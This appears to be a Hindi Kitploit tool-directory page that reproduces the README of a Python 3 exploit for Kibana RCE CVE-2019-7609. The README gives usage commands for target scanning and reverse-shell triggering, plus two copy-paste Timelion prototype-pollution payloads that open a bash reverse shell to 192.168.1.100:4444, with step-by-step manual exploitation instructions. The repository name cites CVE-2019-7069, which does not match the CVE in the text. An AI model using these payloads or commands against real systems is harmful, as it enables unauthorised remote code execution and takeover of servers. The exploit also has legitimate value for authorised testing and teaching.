Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-7069-POC — Python 3 एक्सप्लॉइट Kibana < 6.6.1 RCE (CVE-2019-7609) के लिए, प्रोटोटाइप प्रदूषण के माध्यम से, स्वचालित संस्करण पहचान और वैकल्पिक रिवर्स शेल के साथ। | Kitploit
उपकरण/GitHubGitHub/caelumisme/cve-2019-7069-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubcaelumisme/cve-2019-7069-poc

CVE-2019-7069-POC

Python 3 एक्सप्लॉइट Kibana < 6.6.1 RCE (CVE-2019-7609) के लिए, प्रोटोटाइप प्रदूषण के माध्यम से, स्वचालित संस्करण पहचान और वैकल्पिक रिवर्स शेल के साथ।

रिपॉजिटरी देखें
111 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Kibana < 6.6.1 रिमोट कोड एक्सेक्यूशन एक्सप्लॉइट (CVE-2019-7609)

Exploit Banner

🚨 शैक्षिक RCE एक्सप्लॉइट 🚨

लेखक: LandGrey (Python3 Refactor by [Your Name])
संदर्भ: Exploit-DB 46651
CVE: CVE-2019-7609


⚠️ अस्वीकरण:
यह स्क्रिप्ट केवल शैक्षिक और अधिकृत पेनिट्रेशन टेस्टिंग के लिए है। इसे उन सिस्टम पर उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है। लेखक और योगदानकर्ता इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।


🎯 यह क्या है?

यह एक Python 3 एक्सप्लॉइट स्क्रिप्ट है जो Kibana संस्करणों < 6.6.1 में रिमोट कोड एक्सेक्यूशन भेद्यता के लिए है। यह एक प्रोटोटाइप प्रदूषण दोष का उपयोग करके मनमाने आदेशों को निष्पादित करता है, जिसमें एक कमजोर Kibana इंस्टेंस पर रिवर्स शेल उत्पन्न करना शामिल है।

🕹️ विशेषताएँ

  • स्वचालित रूप से Kibana संस्करण का पता लगाता है
  • भेद्यता की स्थिति की पुष्टि करता है
  • वैकल्पिक रूप से आपके सुनने वाले के लिए रिवर्स शेल ट्रिगर करता है
  • स्वच्छ, संवादात्मक टर्मिनल आउटपुट
  • पूरी तरह से Python 3 के अनुकूल

📚 संदर्भ

  • Exploit-DB प्रविष्टि 46651
  • Kibana आधिकारिक साइट
  • CVE-2019-7609

🚀 उपयोग

python3 kibana_exploit.py -u http://target-kibana:5601

रिवर्स शेल ट्रिगर करने के लिए:

python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT

उदाहरण

python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444

🛠️ आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी
  • packaging लाइब्रेरी

निर्भरताएँ स्थापित करने के लिए:

pip install requests packaging

💡 Timelion के माध्यम से मैनुअल शोषण

आप इस भेद्यता को Kibana के Timelion विज़ुअलाइज़र का उपयोग करके मैन्युअल रूप से भी शोषित कर सकते हैं:

  1. Kibana खोलें
  2. निम्नलिखित पेलोड में से एक को Timelion विज़ुअलाइज़र में पेस्ट करें
  3. Run पर क्लिक करें
  4. बाएं पैनल में, Canvas पर क्लिक करें
  5. आपका रिवर्स शेल पॉप अप होना चाहिए! :)

securityMB द्वारा पेलोड:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

chybeta द्वारा पेलोड:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

192.168.1.100 और 4444 को अपने स्वयं के लिसनर आईपी और पोर्ट से बदलें।


🧩 यह कैसे काम करता है

  • HTTP अनुरोध के माध्यम से Kibana संस्करण का पता लगाता है
  • जांचता है कि लक्ष्य CVE-2019-7609 के प्रति संवेदनशील है या नहीं
  • मनमाने आदेशों को निष्पादित करने के लिए प्रोटोटाइप प्रदूषण का शोषण करता है
  • वैकल्पिक रूप से आपके निर्दिष्ट होस्ट और पोर्ट पर रिवर्स शेल उत्पन्न करता है

🎨 आउटपुट

स्क्रिप्ट पहचान, सत्यापन, और शोषण के लिए स्पष्ट, चरण-दर-चरण आउटपुट प्रदान करती है, जिससे इसका पालन करना आसान और उपयोग करना मज़ेदार हो जाता है!


👾 मज़े और सीखने के लिए

यह स्क्रिप्ट प्रोटोटाइप प्रदूषण, रिमोट कोड एक्सेक्यूशन, और पेनिट्रेशन टेस्टिंग तकनीकों के बारे में सीखने का एक शानदार तरीका है। इसका जिम्मेदारी से और हमेशा अनुमति के साथ उपयोग करें!


📝 लाइसेंस

यह प्रोजेक्ट केवल शैक्षिक उपयोग के लिए है। कोई वारंटी नहीं, कोई गारंटी नहीं। नैतिक रूप से हैक करें, जिज्ञासु रहें, और मज़े करें!

टूल डाउनलोड करें